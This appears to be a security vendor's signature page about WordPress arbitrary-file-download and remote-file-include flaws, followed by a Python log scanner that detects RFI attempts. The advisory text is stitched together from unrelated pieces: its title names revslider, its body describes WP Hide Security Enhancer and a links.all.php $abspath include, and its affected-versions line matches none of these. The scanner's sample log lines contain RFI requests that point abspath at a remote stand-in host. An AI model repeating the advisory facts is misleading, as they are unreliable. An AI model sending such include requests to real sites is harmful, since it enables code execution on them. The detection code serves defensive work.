ET WEB_SPECIFIC_APPS WP Generic revslider Arbitrary File Download

Notice: Monitoring services will be discontinued from March 31st, 2019.


The remote WordPress server uses a third-party plugin that is prone to an arbitrary file download vulnerability. WP Hide Security Enhancer version 1.3.9.2 or lower is affected by an arbitrary file download vulnerability, which allows any visitor to download any file in the installation.

This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the WordPress links.all.php script. WordPress allows users to generate news pages and weblogs dynamically; it uses PHP and a MySQL database to generate dynamic pages.

A vulnerability has been reported for WordPress. The problem is said to occur due to insufficient sanitization of user-supplied URI parameters. Specifically, the '$abspath' variable, which is used as an argument to the PHP require() function, is not sufficiently sanitized of malicious input. As a result, an attacker may be able to include a malicious 'blog.header.php' from a web server under their control, which may result in the execution of the PHP code within that script. Successful exploitation would allow an attacker to execute arbitrary PHP commands on the target server with the privileges of WordPress.
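As an added example (not part of the original article), the following Python shows the kind of check such a signature performs: it scans a few constructed access-log lines and flags requests where an include-path parameter such as abspath carries a remote URL instead of a local path. The log format, the watched parameter name and the sample addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from the original page).
# The last two carry a remote URL in the abspath parameter, the shape of an
# RFI attempt; the second carries the same parameter with a local path.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2019:10:01:02 +0000] "GET /wp-blog-header.php HTTP/1.1" 200 512
10.0.0.6 - - [10/Jan/2019:10:01:09 +0000] "GET /links.all.php?abspath=/var/www/ HTTP/1.1" 200 1024
198.51.100.7 - - [10/Jan/2019:10:02:11 +0000] "GET /links.all.php?abspath=http://203.0.113.9/ HTTP/1.1" 200 1040
198.51.100.7 - - [10/Jan/2019:10:02:15 +0000] "GET /links.all.php?abspath=HTTP%3A%2F%2F203.0.113.9%2Fx%3F HTTP/1.1" 200 1040
"""

# Combined-log-format request line (assumed format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)
# A value that starts with a URL scheme is being used as a remote include path.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?|php|data)://', re.IGNORECASE)
# Parameters that feed an include/require path; the page names $abspath.
WATCHED_PARAMS = {"abspath"}


def is_remote_include(value):
    # parse_qs already decoded the value once; decoding again catches
    # double-encoded scheme prefixes that a naive string match would miss.
    decoded = unquote(value)
    return bool(REMOTE_SCHEME_RE.match(decoded))


def scan_log(text):
    """Return one hit per request whose watched parameter holds a remote URL."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        url = urlsplit(m.group("target"))
        params = parse_qs(url.query, keep_blank_values=True)
        for name, values in params.items():
            if name.lower() in WATCHED_PARAMS and any(is_remote_include(v) for v in values):
                hits.append({"src": m.group("src"), "path": url.path,
                             "param": name, "value": values[0],
                             "status": m.group("status")})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {hit['src']} -> {hit['path']} ({hit['param']}={hit['value']})")
```

A response status of 200 on a flagged request is worth a closer look, since a file that includes the remote URL would typically still answer normally.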

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Affected

All WordPress versions below 3.7.6

Solution

Upgrade to the latest WordPress version.
